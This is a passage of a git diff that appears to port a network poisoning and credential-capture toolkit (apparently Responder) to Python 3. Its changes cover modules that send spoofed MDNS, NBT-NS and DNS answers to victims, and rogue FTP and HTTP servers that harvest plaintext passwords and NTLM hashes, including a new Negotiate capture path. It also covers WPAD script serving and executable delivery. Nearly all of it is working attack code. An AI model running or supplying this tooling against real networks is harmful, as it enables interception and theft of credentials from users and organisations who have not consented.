MDNS_Ans(AnswerName = Poisoned_Name) + else: + Buffer = MDNS_Ans(AnswerName = Poisoned_Name, TTL=settings.Config.TTL) Buffer.calculate() - soc.sendto(str(Buffer), (MADDR, MPORT)) + soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address) + if not settings.Config.Quiet_Mode: + print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0].replace("::ffff:",""), Request_Name), 2, 1)) + SavePoisonersToDb({ + 'Poisoner': 'MDNS', + 'SentToIp': self.client_address[0], + 'ForName': Request_Name, + 'AnalyzeMode': '0', + }) - print color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name), 2, 1) - SavePoisonersToDb({ - 'Poisoner': 'MDNS', - 'SentToIp': self.client_address[0], - 'ForName': Request_Name, - 'AnalyzeMode': '0', - }) + elif MDNSType == 'IPv6' and Have_IPv6: # Poisoning Mode + Poisoned_Name = Poisoned_MDNS_Name(data) + #Use default: + if settings.Config.TTL == None: + Buffer = MDNS6_Ans(AnswerName = Poisoned_Name) + else: + Buffer = MDNS6_Ans(AnswerName = Poisoned_Name, TTL= settings.Config.TTL) + Buffer.calculate() + soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address) + if not settings.Config.Quiet_Mode: + print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0].replace("::ffff:",""), Request_Name), 2, 1)) + SavePoisonersToDb({ + 'Poisoner': 'MDNS6', + 'SentToIp': self.client_address[0], + 'ForName': Request_Name, + 'AnalyzeMode': '0', + }) + except: + raise diff --git a/poisoners/NBTNS.py b/poisoners/NBTNS.py old mode 100644 new mode 100755 index d500a80..ff3a1cd --- a/poisoners/NBTNS.py +++ b/poisoners/NBTNS.py @@ -14,67 +14,51 @@ # # You should have received a copy of the GNU General Public License # along with this program. If not, see . -import fingerprint - +import sys from packets import NBT_Ans -from SocketServer import BaseRequestHandler from utils import * -# Define what are we answering to. -def Validate_NBT_NS(data): - if settings.Config.AnalyzeMode: - return False - elif NBT_NS_Role(data[43:46]) == "File Server": - return True - elif settings.Config.NBTNSDomain: - if NBT_NS_Role(data[43:46]) == "Domain Controller": - return True - elif settings.Config.Wredirect: - if NBT_NS_Role(data[43:46]) == "Workstation/Redirector": - return True - return False +if (sys.version_info > (3, 0)): + from socketserver import BaseRequestHandler +else: + from SocketServer import BaseRequestHandler # NBT_NS Server class. class NBTNS(BaseRequestHandler): def handle(self): + try: + data, socket = self.request + Name = Decode_Name(NetworkRecvBufferPython2or3(data[13:45])) + # Break out if we don't want to respond to this host + if RespondToThisHost(self.client_address[0].replace("::ffff:",""), Name) is not True: + return None - data, socket = self.request - Name = Decode_Name(data[13:45]) + if data[2:4] == b'\x01\x10': + if settings.Config.AnalyzeMode: # Analyze Mode + print(text('[Analyze mode: NBT-NS] Request by %-15s for %s, ignoring' % (color(self.client_address[0].replace("::ffff:",""), 3), color(Name, 3)))) + SavePoisonersToDb({ + 'Poisoner': 'NBT-NS', + 'SentToIp': self.client_address[0], + 'ForName': Name, + 'AnalyzeMode': '1', + }) + else: # Poisoning Mode + if settings.Config.TTL == None: + Buffer1 = NBT_Ans() + else: + Buffer1 = NBT_Ans(TTL=settings.Config.TTL) + Buffer1.calculate(data) + socket.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address) + if not settings.Config.Quiet_Mode: + LineHeader = "[*] [NBT-NS]" + print(color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, NBT_NS_Role(NetworkRecvBufferPython2or3(data[43:46]))), 2, 1)) + SavePoisonersToDb({ + 'Poisoner': 'NBT-NS', + 'SentToIp': self.client_address[0], + 'ForName': Name, + 'AnalyzeMode': '0', + }) + except: + raise - # Break out if we don't want to respond to this host - if RespondToThisHost(self.client_address[0], Name) is not True: - return None - - if data[2:4] == "\x01\x10": - Finger = None - if settings.Config.Finger_On_Off: - Finger = fingerprint.RunSmbFinger((self.client_address[0],445)) - - if settings.Config.AnalyzeMode: # Analyze Mode - LineHeader = "[Analyze mode: NBT-NS]" - print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1) - SavePoisonersToDb({ - 'Poisoner': 'NBT-NS', - 'SentToIp': self.client_address[0], - 'ForName': Name, - 'AnalyzeMode': '1', - }) - else: # Poisoning Mode - Buffer = NBT_Ans() - Buffer.calculate(data) - socket.sendto(str(Buffer), self.client_address) - LineHeader = "[*] [NBT-NS]" - - print color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0], Name, NBT_NS_Role(data[43:46])), 2, 1) - - SavePoisonersToDb({ - 'Poisoner': 'NBT-NS', - 'SentToIp': self.client_address[0], - 'ForName': Name, - 'AnalyzeMode': '0', - }) - - if Finger is not None: - print text("[FINGER] OS Version : %s" % color(Finger[0], 3)) - print text("[FINGER] Client Version : %s" % color(Finger[1], 3)) diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..8bd1f34 --- /dev/null +++ b/requirements.txt @@ -0,0 +1,2 @@ +aioquic +netifaces>=0.10.4 diff --git a/servers/Browser.py b/servers/Browser.py index 0d8a396..5dfaccf 100644 --- a/servers/Browser.py +++ b/servers/Browser.py @@ -14,40 +14,43 @@ # # You should have received a copy of the GNU General Public License # along with this program. If not, see . -from packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData -from SocketServer import BaseRequestHandler from utils import * +from packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData +if settings.Config.PY2OR3 == "PY3": + from socketserver import BaseRequestHandler +else: + from SocketServer import BaseRequestHandler import struct def WorkstationFingerPrint(data): return { - "\x04\x00" :"Windows 95", - "\x04\x0A" :"Windows 98", - "\x04\x5A" :"Windows ME", - "\x05\x00" :"Windows 2000", - "\x05\x01" :"Windows XP", - "\x05\x02" :"Windows XP(64-Bit)/Windows 2003", - "\x06\x00" :"Windows Vista/Server 2008", - "\x06\x01" :"Windows 7/Server 2008R2", - "\x06\x02" :"Windows 8/Server 2012", - "\x06\x03" :"Windows 8.1/Server 2012R2", - "\x0A\x00" :"Windows 10/Server 2016", + b"\x04\x00" :"Windows 95", + b"\x04\x0A" :"Windows 98", + b"\x04\x5A" :"Windows ME", + b"\x05\x00" :"Windows 2000", + b"\x05\x01" :"Windows XP", + b"\x05\x02" :"Windows XP(64-Bit)/Windows 2003", + b"\x06\x00" :"Windows Vista/Server 2008", + b"\x06\x01" :"Windows 7/Server 2008R2", + b"\x06\x02" :"Windows 8/Server 2012", + b"\x06\x03" :"Windows 8.1/Server 2012R2", + b"\x0A\x00" :"Windows 10/Server 2016", }.get(data, 'Unknown') def RequestType(data): return { - "\x01": 'Host Announcement', - "\x02": 'Request Announcement', - "\x08": 'Browser Election', - "\x09": 'Get Backup List Request', - "\x0a": 'Get Backup List Response', - "\x0b": 'Become Backup Browser', - "\x0c": 'Domain/Workgroup Announcement', - "\x0d": 'Master Announcement', - "\x0e": 'Reset Browser State Announcement', - "\x0f": 'Local Master Announcement', + b"\x01": 'Host Announcement', + b"\x02": 'Request Announcement', + b"\x08": 'Browser Election', + b"\x09": 'Get Backup List Request', + b"\x0a": 'Get Backup List Response', + b"\x0b": 'Become Backup Browser', + b"\x0c": 'Domain/Workgroup Announcement', + b"\x0d": 'Master Announcement', + b"\x0e": 'Reset Browser State Announcement', + b"\x0f": 'Local Master Announcement', }.get(data, 'Unknown') @@ -55,13 +58,13 @@ def PrintServerName(data, entries): if entries <= 0: return None entrieslen = 26 * entries - chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries + chunks, chunk_size = len(data[:entrieslen]), entrieslen//entries ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size)] l = [] for x in ServerName: fingerprint = WorkstationFingerPrint(x[16:18]) - name = x[:16].replace('\x00', '') + name = x[:16].strip(b'\x00').decode('latin-1') l.append('%s (%s)' % (name, fingerprint)) return l @@ -70,24 +73,24 @@ def ParsePacket(Payload): PayloadOffset = struct.unpack('i", len(''.join(Packet))) + Packet + Buffer = StructPython2or3('>i', str(Packet))+str(Packet)#struct.pack(">i", len(''.join(Packet))) + Packet - s.send(Buffer) + s.send(NetworkSendBufferPython2or3(Buffer)) data = s.recv(1024) # Session Setup AndX Request, Anonymous. - if data[8:10] == "\x72\x00": + if data[8:10] == b'\x72\x00': Header = SMBHeader(cmd="\x73",mid="\x02\x00") Body = SMBSessionData() Body.calculate() Packet = str(Header)+str(Body) - Buffer = struct.pack(">i", len(''.join(Packet))) + Packet + Buffer = StructPython2or3('>i', str(Packet))+str(Packet) - s.send(Buffer) + s.send(NetworkSendBufferPython2or3(Buffer)) data = s.recv(1024) # Tree Connect IPC$. - if data[8:10] == "\x73\x00": - Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34],mid="\x03\x00") + if data[8:10] == b'\x73\x00': + Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34].decode('latin-1'),mid="\x03\x00") Body = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$") Body.calculate() Packet = str(Header)+str(Body) - Buffer = struct.pack(">i", len(''.join(Packet))) + Packet + Buffer = StructPython2or3('>i', str(Packet))+str(Packet) - s.send(Buffer) + s.send(NetworkSendBufferPython2or3(Buffer)) data = s.recv(1024) # Rap ServerEnum. - if data[8:10] == "\x75\x00": - Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x04\x00") + if data[8:10] == b'\x75\x00': + Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x04\x00") Body = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain)) Body.calculate() Packet = str(Header)+str(Body) - Buffer = struct.pack(">i", len(''.join(Packet))) + Packet + Buffer = StructPython2or3('>i', str(Packet))+str(Packet) - s.send(Buffer) + s.send(NetworkSendBufferPython2or3(Buffer)) data = s.recv(64736) # Rap ServerEnum, Get answer and return what we're looking for. - if data[8:10] == "\x25\x00": + if data[8:10] == b'\x25\x00': s.close() return ParsePacket(data) except: @@ -162,8 +165,10 @@ def BecomeBackup(data,Client): Role = NBT_NS_Role(data[45:48]) if settings.Config.AnalyzeMode: - print text("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain)) - print RAPThisDomain(Client, Domain) + print(text("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client.replace("::ffff:",""), Name,Role,Domain))) + RAPInfo = RAPThisDomain(Client, Domain) + if RAPInfo is not None: + print(RAPInfo) except: pass @@ -177,8 +182,10 @@ def ParseDatagramNBTNames(data,Client): if Role2 == "Domain Controller" or Role2 == "Browser Election" or Role2 == "Local Master Browser" and settings.Config.AnalyzeMode: - print text('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client, Name, Role1, Domain, Role2)) - print RAPThisDomain(Client, Domain) + print(text('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client.replace("::ffff:",""), Name, Role1, Domain, Role2))) + RAPInfo = RAPThisDomain(Client, Domain) + if RAPInfo is not None: + print(RAPInfo) except: pass @@ -189,7 +196,7 @@ class Browser(BaseRequestHandler): request, socket = self.request if settings.Config.AnalyzeMode: - ParseDatagramNBTNames(request,self.client_address[0]) + ParseDatagramNBTNames(NetworkRecvBufferPython2or3(request),self.client_address[0]) BecomeBackup(request,self.client_address[0]) BecomeBackup(request,self.client_address[0]) diff --git a/servers/DNS.py b/servers/DNS.py old mode 100644 new mode 100755 index e4093b8..521599d --- a/servers/DNS.py +++ b/servers/DNS.py @@ -14,34 +14,74 @@ # # You should have received a copy of the GNU General Public License # along with this program. If not, see . -from packets import DNS_Ans -from SocketServer import BaseRequestHandler from utils import * +from packets import DNS_Ans, DNS_SRV_Ans, DNS6_Ans, DNS_AnsOPT +if settings.Config.PY2OR3 == "PY3": + from socketserver import BaseRequestHandler +else: + from SocketServer import BaseRequestHandler + +#Should we answer to those AAAA? +Have_IPv6 = settings.Config.IPv6 def ParseDNSType(data): QueryTypeClass = data[len(data)-4:] - + OPT = data[len(data)-22:len(data)-20] + if OPT == "\x00\x29": + return "OPTIPv4" # If Type A, Class IN, then answer. - return QueryTypeClass == "\x00\x01\x00\x01" + elif QueryTypeClass == "\x00\x01\x00\x01": + return "A" + elif QueryTypeClass == "\x00\x21\x00\x01": + return "SRV" + elif QueryTypeClass == "\x00\x1c\x00\x01": + return "IPv6" class DNS(BaseRequestHandler): def handle(self): - # Break out if we don't want to respond to this host + # Ditch it if we don't want to respond to this host if RespondToThisIP(self.client_address[0]) is not True: return None try: data, soc = self.request - - if ParseDNSType(data) and settings.Config.AnalyzeMode == False: + if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "A": buff = DNS_Ans() - buff.calculate(data) - soc.sendto(str(buff), self.client_address) + buff.calculate(NetworkRecvBufferPython2or3(data)) + soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address) + ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) + print(color("[*] [DNS] A Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) + + if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv4": + buff = DNS_AnsOPT() + buff.calculate(NetworkRecvBufferPython2or3(data)) + soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address) + ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) + print(color("[*] [DNS] A OPT Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) + + if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "SRV": + buff = DNS_SRV_Ans() + buff.calculate(NetworkRecvBufferPython2or3(data)) + soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address) + ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) + print(color("[*] [DNS] SRV Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) + + if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "IPv6" and Have_IPv6: + buff = DNS6_Ans() + buff.calculate(NetworkRecvBufferPython2or3(data)) + soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address) + ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) + print(color("[*] [DNS] AAAA Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) + + if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv6" and Have_IPv6: + buff = DNS6_Ans() + buff.calculate(NetworkRecvBufferPython2or3(data)) + soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address) + ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) + print(color("[*] [DNS] AAAA OPT Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) - ResolveName = re.sub(r'[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) - print color("[*] [DNS] Poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0], ResolveName), 2, 1) except Exception: pass @@ -55,14 +95,40 @@ class DNSTCP(BaseRequestHandler): try: data = self.request.recv(1024) - - if ParseDNSType(data) and settings.Config.AnalyzeMode is False: + if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "A": buff = DNS_Ans() - buff.calculate(data) - self.request.send(str(buff)) - + buff.calculate(NetworkRecvBufferPython2or3(data)) + self.request.send(NetworkSendBufferPython2or3(buff)) ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) - print color("[*] [DNS-TCP] Poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0], ResolveName), 2, 1) + print(color("[*] [DNS] A Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) + + if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv4": + buff = DNS_AnsOPT() + buff.calculate(NetworkRecvBufferPython2or3(data)) + self.request.send(NetworkSendBufferPython2or3(buff)) + ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) + print(color("[*] [DNS] A OPT Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) + + if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "SRV": + buff = DNS_SRV_Ans() + buff.calculate(NetworkRecvBufferPython2or3(data)) + self.request.send(NetworkSendBufferPython2or3(buff)) + ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) + print(color("[*] [DNS] SRV Record poisoned answer sent: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) + + if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "IPv6" and Have_IPv6: + buff = DNS6_Ans() + buff.calculate(NetworkRecvBufferPython2or3(data)) + self.request.send(NetworkSendBufferPython2or3(buff)) + ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) + print(color("[*] [DNS] AAAA Record poisoned answer sent: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) + + if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv6" and Have_IPv6: + buff = DNS6_AnsOPT() + buff.calculate(NetworkRecvBufferPython2or3(data)) + self.request.send(NetworkSendBufferPython2or3(buff)) + ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) + print(color("[*] [DNS] AAAA OPT Record poisoned answer sent: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) except Exception: pass diff --git a/servers/FTP.py b/servers/FTP.py old mode 100644 new mode 100755 index d2f50a2..d1ffac0 --- a/servers/FTP.py +++ b/servers/FTP.py @@ -15,28 +15,30 @@ # You should have received a copy of the GNU General Public License # along with this program. If not, see . from utils import * -from SocketServer import BaseRequestHandler +if settings.Config.PY2OR3 == "PY3": + from socketserver import BaseRequestHandler +else: + from SocketServer import BaseRequestHandler + from packets import FTPPacket class FTP(BaseRequestHandler): def handle(self): try: - self.request.send(str(FTPPacket())) + self.request.send(NetworkSendBufferPython2or3(FTPPacket())) data = self.request.recv(1024) - if data[0:4] == "USER": - User = data[5:].strip() + if data[0:4] == b'USER': + User = data[5:].strip().decode("latin-1") Packet = FTPPacket(Code="331",Message="User name okay, need password.") - self.request.send(str(Packet)) + self.request.send(NetworkSendBufferPython2or3(Packet)) data = self.request.recv(1024) - if data[0:4] == "PASS": - Pass = data[5:].strip() - + if data[0:4] == b'PASS': + Pass = data[5:].strip().decode("latin-1") Packet = FTPPacket(Code="530",Message="User not logged in.") - self.request.send(str(Packet)) - data = self.request.recv(1024) + self.request.send(NetworkSendBufferPython2or3(Packet)) SaveToDb({ 'module': 'FTP', @@ -49,8 +51,9 @@ class FTP(BaseRequestHandler): else: Packet = FTPPacket(Code="502",Message="Command not implemented.") - self.request.send(str(Packet)) + self.request.send(NetworkSendBufferPython2or3(Packet)) data = self.request.recv(1024) except Exception: + self.request.close() pass diff --git a/servers/HTTP.py b/servers/HTTP.py index 4a3d3ca..70b6b63 100644 --- a/servers/HTTP.py +++ b/servers/HTTP.py @@ -15,10 +15,13 @@ # You should have received a copy of the GNU General Public License # along with this program. If not, see . import struct -from SocketServer import BaseRequestHandler, StreamRequestHandler -from base64 import b64decode +import codecs from utils import * - +if settings.Config.PY2OR3 == "PY3": + from socketserver import BaseRequestHandler, StreamRequestHandler +else: + from SocketServer import BaseRequestHandler, StreamRequestHandler +from base64 import b64decode, b64encode from packets import NTLM_Challenge from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans,WEBDAV_Options_Answer from packets import WPADScript, ServeExeFile, ServeHtmlFile @@ -28,28 +31,29 @@ from packets import WPADScript, ServeExeFile, ServeHtmlFile def ParseHTTPHash(data, Challenge, client, module): LMhashLen = struct.unpack(' 1 and settings.Config.Verbose: - print text("[HTTP] Cookie : %s " % Cookie) + print(text("[HTTP] Cookie : %s " % Cookie)) return Cookie return False -def GrabHost(data, host): - Host = re.search(r'(Host:*.\=*)[^\r\n]*', data) - - if Host: - Host = Host.group(0).replace('Host: ', '') - if settings.Config.Verbose: - print text("[HTTP] Host : %s " % color(Host, 3)) - return Host - return False - def GrabReferer(data, host): Referer = re.search(r'(Referer:*.\=*)[^\r\n]*', data) if Referer: Referer = Referer.group(0).replace('Referer: ', '') if settings.Config.Verbose: - print text("[HTTP] Referer : %s " % color(Referer, 3)) + print(text("[HTTP] Referer : %s " % color(Referer, 3))) return Referer return False -def SpotFirefox(data): - UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data) - if UserAgent: - print text("[HTTP] %s" % color("User-Agent : "+UserAgent[0], 2)) - IsFirefox = re.search('Firefox', UserAgent[0]) - if IsFirefox: - print color("[WARNING]: Mozilla doesn't switch to fail-over proxies (as it should) when one's failing.", 1) - print color("[WARNING]: The current WPAD script will cause disruption on this host. Sending a dummy wpad script (DIRECT connect)", 1) - return True - else: - return False - def WpadCustom(data, client): Wpad = re.search(r'(/wpad.dat|/*\.pac)', data) - if Wpad and SpotFirefox(data): - Buffer = WPADScript(Payload="function FindProxyForURL(url, host){return 'DIRECT';}") - Buffer.calculate() - return str(Buffer) - - if Wpad and SpotFirefox(data) == False: + if Wpad: Buffer = WPADScript(Payload=settings.Config.WPAD_Script) Buffer.calculate() return str(Buffer) @@ -145,17 +121,16 @@ def ServeOPTIONS(data): def ServeFile(Filename): with open (Filename, "rb") as bk: - return bk.read() + return NetworkRecvBufferPython2or3(bk.read()) def RespondWithFile(client, filename, dlname=None): - if filename.endswith('.exe'): Buffer = ServeExeFile(Payload = ServeFile(filename), ContentDiFile=dlname) else: Buffer = ServeHtmlFile(Payload = ServeFile(filename)) Buffer.calculate() - print text("[HTTP] Sending file %s to %s" % (filename, client)) + print(text("[HTTP] Sending file %s to %s" % (filename, client))) return str(Buffer) def GrabURL(data, host): @@ -164,17 +139,18 @@ def GrabURL(data, host): POSTDATA = re.findall(r'(?<=\r\n\r\n)[^*]*', data) if GET and settings.Config.Verbose: - print text("[HTTP] GET request from: %-15s URL: %s" % (host, color(''.join(GET), 5))) + print(text("[HTTP] GET request from: %-15s URL: %s" % (host, color(''.join(GET), 5)))) if POST and settings.Config.Verbose: - print text("[HTTP] POST request from: %-15s URL: %s" % (host, color(''.join(POST), 5))) + print(text("[HTTP] POST request from: %-15s URL: %s" % (host, color(''.join(POST), 5)))) if len(''.join(POSTDATA)) > 2: - print text("[HTTP] POST Data: %s" % ''.join(POSTDATA).strip()) + print(text("[HTTP] POST Data: %s" % ''.join(POSTDATA).strip())) # Handle HTTP packet sequence. def PacketSequence(data, client, Challenge): NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) + NTLM_Auth2 = re.findall(r'(?<=Authorization: Negotiate )[^\r]*', data) Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data) # Serve the .exe if needed @@ -187,79 +163,110 @@ def PacketSequence(data, client, Challenge): WPAD_Custom = WpadCustom(data, client) # Webdav - if ServeOPTIONS(data): - return ServeOPTIONS(data) + if ServeOPTIONS(data): + return ServeOPTIONS(data) if NTLM_Auth: Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] - print "Challenge 2:", Challenge.encode('hex') - if Packet_NTLM == "\x01": + if Packet_NTLM == b'\x01': GrabURL(data, client) - GrabReferer(data, client) - GrabHost(data, client) + #GrabReferer(data, client) GrabCookie(data, client) - Buffer = NTLM_Challenge(ServerChallenge=Challenge) + Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge)) Buffer.calculate() - Buffer_Ans = IIS_NTLM_Challenge_Ans() - Buffer_Ans.calculate(str(Buffer)) - return str(Buffer_Ans) + Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1')) + Buffer_Ans.calculate() + return Buffer_Ans - if Packet_NTLM == "\x03": + if Packet_NTLM == b'\x03': NTLM_Auth = b64decode(''.join(NTLM_Auth)) - if IsWebDAV(data): + if IsWebDAV(data): module = "WebDAV" - else: + else: module = "HTTP" ParseHTTPHash(NTLM_Auth, Challenge, client, module) if settings.Config.Force_WPAD_Auth and WPAD_Custom: - print text("[HTTP] WPAD (auth) file sent to %s" % client) + print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:",""))) return WPAD_Custom else: Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) Buffer.calculate() - return str(Buffer) + return Buffer + + elif NTLM_Auth2: + Packet_NTLM = b64decode(''.join(NTLM_Auth2))[8:9] + if Packet_NTLM == b'\x01': + GrabURL(data, client) + #GrabReferer(data, client) + GrabCookie(data, client) + + Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge)) + Buffer.calculate() + Buffer_Ans = IIS_NTLM_Challenge_Ans(WWWAuth = "WWW-Authenticate: Negotiate ", Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1')) + Buffer_Ans.calculate() + return Buffer_Ans + + if Packet_NTLM == b'\x03': + NTLM_Auth = b64decode(''.join(NTLM_Auth2)) + if IsWebDAV(data): + module = "WebDAV" + else: + module = "HTTP" + ParseHTTPHash(NTLM_Auth, Challenge, client, module) + + if settings.Config.Force_WPAD_Auth and WPAD_Custom: + print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:",""))) + + return WPAD_Custom + else: + Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) + Buffer.calculate() + return Buffer elif Basic_Auth: ClearText_Auth = b64decode(''.join(Basic_Auth)) GrabURL(data, client) - GrabReferer(data, client) - GrabHost(data, client) + #GrabReferer(data, client) GrabCookie(data, client) SaveToDb({ 'module': 'HTTP', 'type': 'Basic', 'client': client, - 'user': ClearText_Auth.split(':')[0], - 'cleartext': ClearText_Auth.split(':')[1], - }) + 'user': ClearText_Auth.decode('latin-1').split(':', maxsplit=1)[0], + 'cleartext': ClearText_Auth.decode('latin-1').split(':', maxsplit=1)[1], + }) if settings.Config.Force_WPAD_Auth and WPAD_Custom: if settings.Config.Verbose: - print text("[HTTP] WPAD (auth) file sent to %s" % client) + print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:",""))) return WPAD_Custom else: Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) Buffer.calculate() - return str(Buffer) + return Buffer else: if settings.Config.Basic: - Response = IIS_Basic_401_Ans() + r = IIS_Basic_401_Ans() + r.calculate() + Response = r if settings.Config.Verbose: - print text("[HTTP] Sending BASIC authentication request to %s" % client) + print(text("[HTTP] Sending BASIC authentication request to %s" % client.replace("::ffff:",""))) else: - Response = IIS_Auth_401_Ans() + r = IIS_Auth_401_Ans() + r.calculate() + Response = r if settings.Config.Verbose: - print text("[HTTP] Sending NTLM authentication request to %s" % client) + print(text("[HTTP] Sending NTLM authentication request to %s" % client.replace("::ffff:",""))) - return str(Response) + return Response # HTTP Server class class HTTP(BaseRequestHandler): @@ -267,46 +274,47 @@ class HTTP(BaseRequestHandler): def handle(self): try: Challenge = RandomChallenge() - while True: self.request.settimeout(3) remaining = 10*1024*1024 #setting max recieve size data = '' while True: buff = '' - buff = self.request.recv(8092) + buff = NetworkRecvBufferPython2or3(self.request.recv(8092)) if buff == '': break data += buff remaining -= len(buff) - if remaining <= 0: - break #check if we recieved the full header if data.find('\r\n\r\n') != -1: #we did, now to check if there was anything else in the request besides the header if data.find('Content-Length') == -1: #request contains only header break - else: - #searching for that content-length field in the header - for line in data.split('\r\n'): - if line.find('Content-Length') != -1: - line = line.strip() - remaining = int(line.split(':')[1].strip()) - len(data) - + else: + #searching for that content-length field in the header + for line in data.split('\r\n'): + if line.find('Content-Length') != -1: + line = line.strip() + remaining = int(line.split(':')[1].strip()) - len(data) + if remaining <= 0: + break + if data == "": + break #now the data variable has the full request Buffer = WpadCustom(data, self.client_address[0]) if Buffer and settings.Config.Force_WPAD_Auth == False: - self.request.send(Buffer) + self.request.send(NetworkSendBufferPython2or3(Buffer)) self.request.close() if settings.Config.Verbose: - print text("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0]) + print(text("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0].replace("::ffff:",""))) else: Buffer = PacketSequence(data,self.client_address[0], Challenge) - self.request.send(Buffer) + self.request.send(NetworkSendBufferPython2or3(Buffer)) - except socket.error: + except: pass + diff --git a/servers/HTTP_Proxy.py b/servers/HTTP_Proxy.py old mode 100644 new mode 100755 index 71e6e75..4463b0f --- a/servers/HTTP_Proxy.py +++ b/servers/HTTP_Proxy.py @@ -14,13 +14,18 @@ # # You should have received a copy of the GNU General Public License # along with this program. If not, see . -import urlparse +from utils import * +if settings.Config.PY2OR3 == "PY3": + import urllib.parse as urlparse + import http.server as BaseHTTPServer 